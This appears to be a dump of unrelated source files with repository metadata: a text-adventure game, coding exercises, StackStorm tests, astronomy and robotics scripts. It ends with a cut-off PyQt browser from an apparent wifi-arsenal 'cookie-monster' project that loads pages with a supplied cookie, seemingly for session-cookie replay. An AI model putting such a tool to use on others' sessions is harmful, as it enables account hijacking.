self.conditions["HasCookie"] = has_cookie
knows_joke = MoveCondition("Do you know a joke?", "the bored little boy is sprawled out in front of the bridge.", "You know a great joke!")
self.conditions["KnowsJoke"] = knows_joke
# There's a lot going on here. This is the non-player character class.
# Here are the inputs:
# desc is the description of the person, such as "a teenage girl."
# falsetxt is what the character says before they have gotten what they want. If the person doesn't want you to do anything besides talk to them, this is never used.
# truetxt_first is what the character says the first time you talk to them after getting/doing the thing they want. For characters that don't want anything this is the first thing they say to you.
# truetxt_have_talked is what they say all other times after getting what they want; it's usually shorter and involves thanking you.
# move_cond_obj_trigger is the MoveCondition this character has control over.
# move_cond_obj_needed is the MoveCondition representing what this character wants.
class Npc(object):
def __init__(self, desc, falsetxt, truetxt_first, truetxt_have_talked, move_cond_obj_trigger, move_cond_obj_needed):
self.description = validate_str(desc)
self.false_text = validate_str(falsetxt)
self.true_text_first = validate_str(truetxt_first)
self.true_text_have_talked = validate_str(truetxt_have_talked)
self.move_condition_trigger = move_cond_obj_trigger #this is the move condition that is toggled by giving this person what they need
self.move_condition_needed = move_cond_obj_needed # this is what needs to be true to satisfy this person so they trigger the "trigger" condition above
self.have_talked = False # have you talked to this person before? No.
def __str__(self):
return self.description
def interact(self):
# this will be the dialog system. You talk to them and stuff happens.
if self.move_condition_needed.fulfilled == True:
if self.have_talked:
print "\n", self.true_text_have_talked, "\n" # their need has been fulfilled and they remember you.
else:
print "\n", self.true_text_first, "\n" #they state that their need has been fulfilled and they thank you
self.move_condition_trigger.make_fulfilled() # changes the state of the triggered condition to fulfilled
self.have_talked = True
else:
print "\n", self.false_text, "\n" #they state that their need has not been fulfilled e.g. I'm still hungry
class Map(object):
win_boat = 6
def __init__(self):
self.boats = []
self.handler = MoveHandler()
self.condits = self.handler.conditions
self.people = {} #the key will be the boat they are on and the value will be the Npc object representing that person
#create people, add them to dictionary "people"
teen_girl = Npc("teenage girl",
"The girl says, 'I'm so hungry! Ever since Mom started rearranging our stuff, \nthe boats are a mess and we can't get to the pantry.' \n \n'It sucks, because I had a great joke I wanted to tell you, but now I can't remember it.'",
"She says, 'Ugh, I'm SOOO hungry!' \n\n 'Is that a cookie? Give me that!' \n\n *munch munch* \n\n'Thanks! Now I remember the joke! What's brown and sticky?' \n\n 'A stick!'",
"She says, 'Thanks for the cookie! Did you like my joke?",
self.condits["KnowsJoke"],
self.condits["HasCookie"])
self.people[1] = teen_girl
young_man = Npc("young man holding a baby",
"He is blocking the path to the yacht. \n\nHe says: 'Hold on a minute, my daughter is crying.'", "You give the toy to the baby and she stops crying. \n\nThe young man says, 'Thanks for calming the baby, go take a cookie from the yacht!'",
"The baby looks happy. She's so cute!",
self.condits["AlwaysYes"],
self.condits["BabyCrying"])
self.people[2] = young_man
baker = Npc("baker wearing an apron",
"shouldn't happen",
"She has just baked a tray of cookies. \n\nShe says, 'Here, have a cookie!'",
"She says, 'Enjoy your cookie!'",
self.condits["HasCookie"],
self.condits["AlwaysYes"])
self.people[3] = baker
little_boy = Npc("little boy",
"He is blocking the bridge to the rowboat. \n\n'UGGGH I'M SO BORED' he moans. \n\n'Do you know any jokes?'",
"You tell him the joke you just learned. He laughs and moves out of the way.",
"The little boy is sitting on the edge of the boat. \n\nHe says, 'I'm still bored. Do you know any more jokes?'",
self.condits["AlwaysYes"],
self.condits["KnowsJoke"])
self.people[4] = little_boy
midage_woman = Npc("middle-aged woman",
"shouldn't happen",
"She says, 'Can you help me clean this mess?' \n\nYou spend a few minutes helping her sort through her family's belongings. \n\nYou find a baby toy. 'Go ahead and take that,' she says. 'My kids are much too old for it now.'",
"She says, 'Thanks so much for helping me clean!'",
self.condits["BabyCrying"],
self.condits["AlwaysYes"])
self.people[5] = midage_woman
#connections to each boat and the logical condition needed to move between them.
boat_cons = [{1: self.condits["AlwaysYes"]}, # boat 0 (beach)
{0: self.condits["AlwaysYes"], 2: self.condits["AlwaysYes"]}, # boat 1
{1: self.condits["AlwaysYes"], 3: self.condits["BabyCrying"], 5: self.condits["AlwaysYes"]}, # boat 2
{2:self.condits["BabyCrying"]}, # boat 3
{6: self.condits["KnowsJoke"], 5:self.condits["AlwaysYes"]}, #boat 4
{2: self.condits["AlwaysYes"], 4:self.condits["AlwaysYes"]}, # boat 5
{4: self.condits["KnowsJoke"]}] # boat 6
boat_kinds = ["the beach", "a small fishing boat", "a house boat", "a dilapidated old yacht", "a sailing ship with the sails missing", "the back part of a shipping barge", "a large rowboat"]
for x in range(7):
# if statement testing if there are people on a given boat
if x in self.people:
a_boat = Boat(x, boat_cons[x], boat_kinds[x], self.people[x])
else:
a_boat = Boat(x, boat_cons[x], boat_kinds[x])
self.boats.append(a_boat)
def see_all_boats(self): # a testing function which isn't used, but it's handy so I'll leave it here.
output = "These are the boats: \n \n "
for boat in self.boats:
output += "\n " + str(boat.position)
output += ", " + boat.kind
output += ", which is home to a " + str(boat.get_person())
output += "\n"
for key in boat.connections:
output += "----this boat is connected to boat " + str(key)
output += " which has move condition, " + str(boat.connections[key])
output += "\n"
print output
def play():
#start playing:
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "Welcome to the boat game!"
print "You start at the beach. There are a number of interconnected boats. The goal is to move to Boat 6, a rowboat."
print "Select options using the numbers on your keyboard and press ENTER or RETURN to proceed."
print "Have fun!"
the_player = Player()
while True:
the_player.on_boat_actions()
play() | [
"[email protected]"
]
| |
9ba77a93b34b31c7c184176444d94a568deb7688 | e4d4149a717d08979953983fa78fea46df63d13d | /Week5/Day1/XP.py | 2c661c7abdf2c8897ce0f26c7fbce353061e2d6f | []
| no_license | fayblash/DI_Bootcamp | 72fd75497a2484d19c779775c49e4306e602d10f | a4e8f62e338df5d5671fd088afa575ea2e290837 | refs/heads/main | 2023-05-05T20:55:31.513558 | 2021-05-27T06:48:40 | 2021-05-27T06:48:40 | 354,818,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,863 | py | # # Exercise 1: Cats
# # Instructions
# # Using this class
# class Cat:
# def __init__(self, name, age):
# self.name = name
# self.age = age
# def oldest_cat(cat_list):
# oldest_current=cat_list[0]
# for cat in cat_list:
# if cat.age>oldest_current.age:
# oldest_current=cat
# return oldest_current
# # Instantiate three Cat objects using the code provided above.
# c1=Cat("Roxy",3)
# c2=Cat("Meow",2)
# c3=Cat("Fluffy",4)
# # Outside of the class, create a function that finds the oldest cat and returns the cat.
# all_cats=[c1,c2,c3]
# oldest=oldest_cat(all_cats)
# print(f"{oldest.name} is the oldest cat and she is {oldest.age} years old.")
# # Print the following string: “The oldest cat is <cat_name>, and is <cat_age> years old.”. Use the function previously created.
# # Exercise 2 : Dogs
# # Instructions
# # Create a class called Dog.
# class Dog:
# def __init__(self,name,height):
# self.name=name
# self.height=height
# def bark(self):
# print(f"{self.name} goes woof!")
# # In this class, create an __init__ method that takes two parameters : name and height. This function instantiates two attributes, which values are the parameters.
# # Create a method called bark that prints the following string “<dog_name> goes woof!”.
# # Create a method called jump that prints the following string “<dog_name> jumps <x> cm high!”. x is the height*2.
# def jump(self):
# print(f"{self.name} jumps {self.height*2} cm")
# # Outside of the class, create an object called davids_dog. His dog’s name is “Rex” and his height is 50cm.
# davids_dog=Dog("Rex",50)
# print(davids_dog.name)
# print(davids_dog.height)
# davids_dog.bark()
# davids_dog.jump()
# # Print the details of his dog (ie. name and height) and call the methods bark and jump.
# # Create an object called sarahs_dog. Her dog’s name is “Teacup” and his height is 20cm.
# sarahs_dog=Dog("Teacup",20)
# print(sarahs_dog.name)
# print(sarahs_dog.height)
# sarahs_dog.bark()
# sarahs_dog.jump()
# # Print the details of her dog (ie. name and height) and call the methods bark and jump.
# # Create an if statement outside of the class to check which dog is bigger. Print the name of the bigger dog.
# if sarahs_dog.height>davids_dog.height:
# print(f"{sarahs_dog.name} is bigger.")
# else:
# print(f"{davids_dog.name} is bigger.")
# # Exercise 3 : Who’s The Song Producer?
# # Instructions
# # Define a class called Song, it will show the lyrics of a song.
# class Song:
# def __init__(self,lyrics):
# self.lyrics=lyrics
# # Its __init__() method should have two arguments: self and lyrics (a list).
# # Inside your class create a method called sing_me_a_song that prints each element of lyrics on its own line.
# def sing_me_a_song(self):
# for lyric in self.lyrics:
# print(lyric)
# # Create an object, for example:
# stairway= Song(["There’s a lady who's sure","all that glitters is gold", "and she’s buying a stairway to heaven"])
# # Then, call the sing_me_a_song method. The output should be:
# stairway.sing_me_a_song()
# # There’s a lady who's sure
# # all that glitters is gold
# # and she’s buying a stairway to heaven
# Exercise 4 : Afternoon At The Zoo
# Instructions
# Create a class called Zoo.
class Zoo:
def __init__(self,zoo_name):
self.zoo_name=zoo_name
self.animals=[]
self.list_animals=[]
# In this class create a method __init__ that takes one parameter: zoo_name.
# It instantiates two attributes: animals (an empty list) and name (name of the zoo).
# Create a method called add_animal that takes one parameter new_animal. This method adds the new_animal to the animals list as long as it isn’t already in the list.
def add_animal(self,new_animal):
if new_animal not in self.animals:
self.animals.append(new_animal)
# Create a method called get_animals that prints all the animals of the zoo.
def get_animals(self):
print(self.animals)
# Create a method called sell_animal that takes one parameter animal_sold. This method removes the animal from the list and of course the animal needs to exist in the list.
def sell_animal(self,animal_sold):
if animal_sold in self.animals:
self.animals.remove(animal_sold)
# Create a method called sort_animals that sorts the animals alphabetically and groups them together based on their first letter.
# Example
    def sort_animals(self):
        self.animals = sorted(self.animals)
        temp_list = [self.animals[0]]
        for i in range(1, len(self.animals)):
            if self.animals[i][0] == temp_list[-1][0]:
                temp_list.append(self.animals[i])
            else:
                self.list_animals.append(temp_list)
                temp_list = [self.animals[i]]
        # append the final group as well; without this the last letter group
        # (e.g. ['Eel', 'Emu']) never reaches list_animals or get_groups()
        self.list_animals.append(temp_list)
        return {v + 1: k for v, k in enumerate(self.list_animals)}
def get_groups(self):
for i in self.list_animals:
print(i)
fays_zoo=Zoo("fay")
fays_zoo.add_animal("Bear")
fays_zoo.add_animal("Ape")
fays_zoo.add_animal("Cat")
fays_zoo.add_animal("Emu")
fays_zoo.add_animal("Cougar")
fays_zoo.add_animal("Eel")
fays_zoo.add_animal("Baboon")
fays_zoo.get_animals()
print(fays_zoo.sort_animals())
fays_zoo.get_groups()
# {
# 1: "Ape",
# 2: ["Baboon", "Bear"],
# 3: ['Cat', 'Cougar'],
# 4: ['Eel', 'Emu']
# }
# Create a method called get_groups that prints the animal/animals inside each group.
#
# Create an object called ramat_gan_safari and call all the methods.
# Tip: The zookeeper is the one who will use this class.
# Example
# Which animal should we add to the zoo --> Giraffe
| [
"[email protected]"
]
| |
9e427939fee2e4d3f52f2a70e6743b49bcc4d34e | cc2fcc1a0c5ea9789f98ec97614d7b25b03ba101 | /st2tests/integration/mistral/test_errors.py | 3280859646406164d582cf4022c8c414ea41ca1f | [
"Apache-2.0"
]
| permissive | Junsheng-Wu/st2 | 6451808da7de84798641882ca202c3d1688f8ba8 | c3cdf657f7008095f3c68b4132b9fe76d2f52d81 | refs/heads/master | 2022-04-30T21:32:44.039258 | 2020-03-03T07:03:57 | 2020-03-03T07:03:57 | 244,301,363 | 0 | 0 | Apache-2.0 | 2022-03-29T22:04:26 | 2020-03-02T06:53:58 | Python | UTF-8 | Python | false | false | 6,469 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from integration.mistral import base
class ExceptionHandlingTest(base.TestWorkflowExecution):
def test_bad_workflow(self):
with self.assertRaises(Exception) as t:
self._execute_workflow('examples.mistral-foobar', {})
self.assertIn('Action "examples.mistral-foobar" cannot be found', t.exception.message)
def test_bad_action(self):
execution = self._execute_workflow('examples.mistral-error-bad-action', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution)
self.assertIn('Failed to find action', execution.result['extra']['state_info'])
def test_bad_wf_arg(self):
execution = self._execute_workflow('examples.mistral-error-bad-wf-arg', {})
execution = self._wait_for_completion(
execution,
expect_tasks=False,
expect_tasks_completed=False
)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Invalid input', execution.result['extra']['state_info'])
def test_bad_task_transition(self):
execution = self._execute_workflow('examples.mistral-error-bad-task-transition', {})
execution = self._wait_for_completion(
execution,
expect_tasks=False,
expect_tasks_completed=False
)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn("Task 'task3' not found", execution.result['error'])
def test_bad_with_items(self):
execution = self._execute_workflow('examples.mistral-error-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Wrong input format', execution.result['extra']['state_info'])
def test_bad_expr_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-expr', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_publish_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-publish', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_subworkflow_input_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-subworkflow-input', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_task_transition_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-task-transition', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_with_items_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_expr_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-expr', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
# TODO: Currently, Mistral returns "UndefinedError ContextView object has no attribute".
# Need to fix Mistral to return "Cannot evaulate Jinja expression."
        #       Need to fix Mistral to return "Cannot evaluate Jinja expression."
# execution.result['extra']['state_info'])
def test_bad_publish_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-publish', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_subworkflow_input_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-subworkflow-input', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_task_transition_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-task-transition', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_with_items_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
| [
"[email protected]"
]
| |
d3a3564a7a3dfa3476aed8c37bc0eefe96e862bd | b54f9fb585648e4fe0b8ca727f42c97a6c1486fd | /variability/varModels.py | 5006e96121da25ab9e80c656b99ff8bf870894bf | []
| no_license | tribeiro/SMAPS | 46a36ab3fd74e35d97d9b43d5d80d88d9581b9da | b1e8dd9444e7fcbc7a82ab30941bab224b5ae600 | refs/heads/master | 2021-01-22T22:35:09.228649 | 2014-05-08T11:19:47 | 2014-05-08T11:19:47 | 19,570,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py |
import numpy as np
###################################################################################################
def ecbinary(time,period,ecduration,depth):
'''
Simulate eclipsing binary.
'''
phase = time / period
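    # np.ceil(phase) counts completed cycles; subtracting it folds every time
    # stamp onto a single period, leaving phase in [-1, 0)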
cycle = np.ceil(phase)
phase = phase - cycle
mask = np.bitwise_and(phase > -ecduration, phase < ecduration)
flux = np.zeros_like(time)+1.0
flux[mask] -= depth
return flux
###################################################################################################
def pulsating(time,period,amplitude):
    '''
    Simulate pulsating star.
    '''
    # scale by amplitude so the parameter is actually honoured; callers such as
    # the __main__ demo below pass amplitude=0.5
    return amplitude*np.sin(2*np.pi*time/period)
###################################################################################################
def transient(time,t0,amplitude,duration):
flux = np.zeros_like(time)
mask = time > t0
flux[mask] += amplitude * np.exp(- ((time[mask]-t0) / duration)**2.)
return flux
###################################################################################################
###################################################################################################
if __name__ == '__main__':
import pylab as py
tt = np.arange(10,40,0.1)
#tobs = np.loadtxt( '/Users/tiago/Documents/JPAS/variables/filtersObservations.txt',
# delimiter=',',unpack=True,usecols=(1,))
mag0 = 16
ectobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
ectobs.sort()
ecflx = mag0-ecbinary(tt,2,0.1,1.5)
ecobs = mag0-ecbinary(ectobs,2,0.1,1.5)
ecerr = np.random.exponential(0.1,len(ectobs)) * (-1)**np.random.randint(0,2,len(ectobs))
pltobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
pltobs.sort()
plflx = mag0-pulsating(tt,2,0.5)
plobs = mag0-pulsating(pltobs,2,0.5)
plerr = np.random.exponential(0.1,len(pltobs)) * (-1)**np.random.randint(0,2,len(pltobs))
trtobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
trtobs.sort()
trflx = mag0-transient(tt,20,1.0,10)+transient(tt,600,10.0,40)
trobs = mag0-transient(trtobs,20,1.0,10)+transient(trtobs,600,10.0,40)
trerr = np.random.exponential(0.1,len(trtobs)) * (-1)**np.random.randint(0,2,len(trtobs))
py.figure(1,figsize=(8,4))
########################
ax1 = py.subplot(311)
py.plot(tt,ecflx,'-')
py.errorbar(ectobs,ecobs+ecerr,0.1,fmt='o')
py.ylim(17.499,14.5)
ax2 = py.subplot(312)
py.plot(tt,plflx,'-')
py.errorbar(pltobs,plobs+plerr,0.1,fmt='o')
py.ylim(17.5,14.5)
ax3 = py.subplot(313)
py.plot(tt,trflx,'-')
py.errorbar(trtobs,trobs+trerr,0.1,fmt='o')
py.ylim(17.5,14.501)
########################
py.setp(ax1.get_xticklabels(),visible=False)
py.setp(ax2.get_xticklabels(),visible=False)
ax3.set_xlabel('Time (days)')
ax2.set_ylabel('Magnitude')
py.subplots_adjust(hspace=0,wspace=0,bottom=0.13,top=0.93)
#py.savefig('/Users/tiago/Dropbox/Apps/TeX Writer (1)/fig/jpas_variability_fig01.pdf')
py.show()
################################################################################################### | [
"[email protected]"
]
| |
4fcd282d60d9e4ac0828e7919689e02b66cd375e | b27f7fcd08a64b4b3ae323c2c11fc3b0df41f323 | /EXECUTABLES/FINALES/Graphing_PDA_mesh.py | 5d6d61fb5e3eb1ade1656a5bf8c2263e6539eccf | []
| no_license | juancotrino/Drought-analysis-functions | ec584e143510817aa81e265d2aac1ca19195f941 | 9a35a343232987bcbeea922ae3393d1103846aa5 | refs/heads/master | 2023-07-16T01:27:51.512523 | 2021-08-17T19:45:08 | 2021-08-17T19:45:08 | 388,537,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 21 19:04:33 2020
@author: juan.cotrino
"""
from Hapi.datagraphing import ColorMeshPDAGraphing
analysis = "NCDA"
variables = ['runoff', 'soil_moisture']
percentiles = [60, 65, 70, 75, 80, 85, 90, 95]
main_path = "E:/JC_FA_TESIS/"
dst_path = main_path + "Datos/Images/"
for variable in variables:
for percentile in percentiles:
db_path = main_path + "Datos/DBs/NCDA_CDA/perc_" + str(percentile) + "/" + analysis + "/" + variable + "/drought_binary_" + variable + "_perc_" + str(percentile) + ".pickle"
ColorMeshPDAGraphing(variable,
percentile,
db_path,
analysis,
dst_path=dst_path)
| [
"[email protected]"
]
| |
c02c67a431312e3b0710cf872c3477faeee8222e | f21ea752700b3afa0729bfa6520ab1c6702e6189 | /tools/graph_bag/scripts/poses.py | c92f7140d19b516cf9465625ffc36620dbebdbad | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-philippe-de-muyter",
"MIT",
"MPL-2.0",
"MPL-1.0",
"LGPL-2.1-or-later",
"Apache-2.0",
"LGPL-2.1-only",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"LGPL-3.0-only",
"CC-BY-NC-4.0",
"GPL-3.0-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla"
]
| permissive | SemaSandbox/astrobee | 01594a46c80d8730be6f5ef753b44ab67a178f1d | e09fba15f241ce044e9b66d19a4767b547c2b720 | refs/heads/master | 2023-07-17T00:21:03.560819 | 2021-07-22T18:46:14 | 2021-07-22T18:46:14 | 391,620,249 | 1 | 0 | Apache-2.0 | 2021-08-01T17:12:56 | 2021-08-01T12:24:35 | null | UTF-8 | Python | false | false | 1,806 | py | #!/usr/bin/python
#
# Copyright (c) 2017, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
#
# All rights reserved.
#
# The Astrobee platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import vector3ds
import orientations
import scipy.spatial.transform
class Poses(object):
def __init__(self, pose_type, topic):
self.positions = vector3ds.Vector3ds()
self.orientations = orientations.Orientations()
self.times = []
self.pose_type = pose_type
self.topic = topic
def add_pose(self, pose_msg, timestamp, bag_start_time=0):
self.positions.add(pose_msg.position.x, pose_msg.position.y, pose_msg.position.z)
euler_angles = scipy.spatial.transform.Rotation.from_quat(
[pose_msg.orientation.x, pose_msg.orientation.y, pose_msg.orientation.z,
pose_msg.orientation.w]).as_euler('ZYX', degrees=True)
self.orientations.add(euler_angles[0], euler_angles[1], euler_angles[2])
self.times.append(timestamp.secs + 1e-9 * timestamp.nsecs - bag_start_time)
def add_msg(self, msg, timestamp, bag_start_time=0):
self.add_pose(msg.pose, timestamp, bag_start_time)
def position_vector(self, index):
return [self.positions.xs[index], self.positions.ys[index], self.positions.zs[index]]
| [
"[email protected]"
]
| |
7acf5941940c678da4795277f2ddd08749ad98a3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03192/s975847643.py | 0b87008f474274d7ec53b07ee4ec58d374c6d871 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | n = int(input())
li = []
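# peel the decimal digits off n (least-significant first) so we can count
# how many of them equal 2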
while n > 0:
li.append(n%10)
n //= 10
li.reverse()
ans = 0
for i in range(len(li)):
if li[i] == 2:
ans += 1
print(ans) | [
"[email protected]"
]
| |
3257da756aabaa07ff821be59ed27b2379fb07f9 | b70657d1f96de8a267cb14a80fd4eb8df56d479f | /screaper_language_model/application/application.py | 6f78ce85467368f264f3647a9de1ff2790b26248 | []
| no_license | yenicelik/screaper | 8ea7e6064f85907edb9ee0261054d35bf1a38758 | de1f194b1dde3b0815e87ddbf5f1906badaf02a6 | refs/heads/main | 2023-04-23T19:10:13.800691 | 2021-05-11T21:13:36 | 2021-05-11T21:13:36 | 316,816,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,902 | py | """
Runs the Flask application
"""
import time
from flask import Flask, jsonify
from flask import request
from screaper_language_model.language_models.bert_multilang_ner import model_ner
application = Flask(__name__)
@application.route('/')
def healthcheckpoint():
return 'Multilingual BERT model up and running for Named Entity Recognition (NER)'
@application.route('/get-named-entities', methods=['GET', 'POST'])
def get_named_entities():
"""
Example request looks as follows:
{
"documents": [
"Bob Ross lived in Florida",
"I like big cookies and I cannot lie"
]
}
:return:
"""
start_time = time.time()
try:
req_data = request.get_json(force=True)
print("req data is: ", req_data)
except Exception as e:
        return jsonify({
            "errors": ["Input data not understood", str(e)]
        })
if "documents" not in req_data:
return jsonify({
"errors": ["Input does not contain 'documents' key", req_data]
})
    if not isinstance(req_data["documents"], list):
        return jsonify({
            "errors": ["'documents' key is not a list", req_data]
        })
    if len(req_data["documents"]) == 0:
        return jsonify({
            "errors": ["'documents' key does not contain any data", req_data]
        })
for x in req_data["documents"]:
if not isinstance(x, str):
return jsonify({
"errors": ["'documents' key does not contain string data", x]
})
try:
queries = req_data["documents"]
except Exception as e:
        return jsonify({
            "errors": ["Other exception occurred", str(e)]
        })
out = model_ner.predict(queries)
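    # model_ner.predict is assumed to return one JSON-serialisable result per
    # input document; this endpoint only passes it through to jsonify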
    print("Request took {} seconds".format(time.time() - start_time))
return jsonify({
"response": out
})
| [
"[email protected]"
]
| |
29b9663bb72f21946ffdb20c501c498e7c0cfee6 | f2e09eea7c995df2cac15f16ae5eeb79b6fc748c | /odmltools/info.py | cda1f635ddc615fb0e6c0b291916d4bb2d05c164 | [
"BSD-2-Clause"
]
| permissive | mpsonntag/odmltools | 676d829212ababd3ea3eb3396f25d0df8f3a4373 | 87e67fc737fbad2bd9866d529d47abbc2b7115d1 | refs/heads/master | 2021-07-13T07:54:23.214505 | 2021-06-21T18:11:19 | 2021-06-21T18:11:19 | 221,953,387 | 0 | 0 | null | 2019-11-15T15:40:14 | 2019-11-15T15:40:14 | null | UTF-8 | Python | false | false | 357 | py | import os
import json
INSTALL_PATH = os.path.dirname(__file__)
with open(os.path.join(INSTALL_PATH, "info.json")) as infofile:
infodict = json.load(infofile)
VERSION = infodict["VERSION"]
AUTHOR = infodict["AUTHOR"]
COPYRIGHT = infodict["COPYRIGHT"]
CONTACT = infodict["CONTACT"]
HOMEPAGE = infodict["HOMEPAGE"]
CLASSIFIERS = infodict["CLASSIFIERS"]
| [
"[email protected]"
]
| |
d923a0a51782d5961b136ff66825a74783eacae5 | d7f4a9f8a525e03fa8811c4a6f4b945dda79adb4 | /deep-learning-course/numerical-stability.py | c3162d2c4b8a73fd12ffe438aa1acce62867ec65 | []
| no_license | sebastianmontero/tensorflow | 3caffb968a403898deb39505041db8b0ce318ca4 | d02be076a03460dd38afa8ccadebbc4afff8ee22 | refs/heads/master | 2020-03-17T03:10:24.959450 | 2018-07-25T09:47:00 | 2018-07-25T09:47:00 | 133,223,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | a = 1
for i in range(1000000):
a += .000001
a -= 1
print(a) | [
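# demonstrates floating-point round-off: adding 1e-6 a million times and then
# subtracting 1 gives a value close to, but not exactly, 1.0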
"[email protected]"
]
| |
8845672ea92d7bddefee80d4f9a40864a8f36823 | bb198232df12a1adb9e8a6164ff2a403bf3107cf | /cookie-monster/MonsterBrowser.py | da21df7b654d09e613e51a1984046a21401e3364 | []
| no_license | vanello/wifi-arsenal | 9eb79a43dfdd73d3ead1ccd5d2caf9bad9e327ee | 1ca4c5a472687f8f017222893f09a970652e9a51 | refs/heads/master | 2021-01-16T22:00:37.657041 | 2015-09-03T03:40:43 | 2015-09-03T03:40:43 | 42,060,303 | 1 | 0 | null | 2015-09-07T15:24:11 | 2015-09-07T15:24:11 | null | UTF-8 | Python | false | false | 3,179 | py | from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
from PyQt4.QtNetwork import *
import getopt
import sys
import re
class MyBrowser(QWebView):
def __init__(self,father=None):
super(MyBrowser, self).__init__(father)
self.page().setLinkDelegationPolicy(QWebPage.DelegateExternalLinks)
self.connect(self, SIGNAL("linkClicked(QUrl)"), self.onLinkClicked)
def onLinkClicked(self, url):
self.load(url)
class MonsterWindow(QWidget):
def __init__(self, father = None):
super(MonsterWindow, self).__init__(father)
class MonsterBrowser():
urlPat = re.compile("https?://([^/]*)(.*)")
def usage(self):
print """
Usage: python MonsterBrowser.py [options] url
Options:
-c --cookie <Cookie> set cookie
-u --useragent <UserAgent> set useragent
"""
def parseArguments(self, argv):
try:
opts, args = getopt.getopt(argv, "c:u:", ["cookie=", "useragent="])
except getopt.GetoptError:
self.usage()
sys.exit(2)
if len(args) < 1:
self.usage()
sys.exit(2)
url = args[0]
cookie = None
useragent = None
for opt, args in opts:
if opt in ("-c", "--cookie"):
cookie = args
if opt in ("-u", "--useragent"):
useragent = args
if useragent is None:
useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1"
print cookie, useragent, url
self.launch(cookie, useragent, url)
def launch(self, rawcookie, useragent, url):
'''
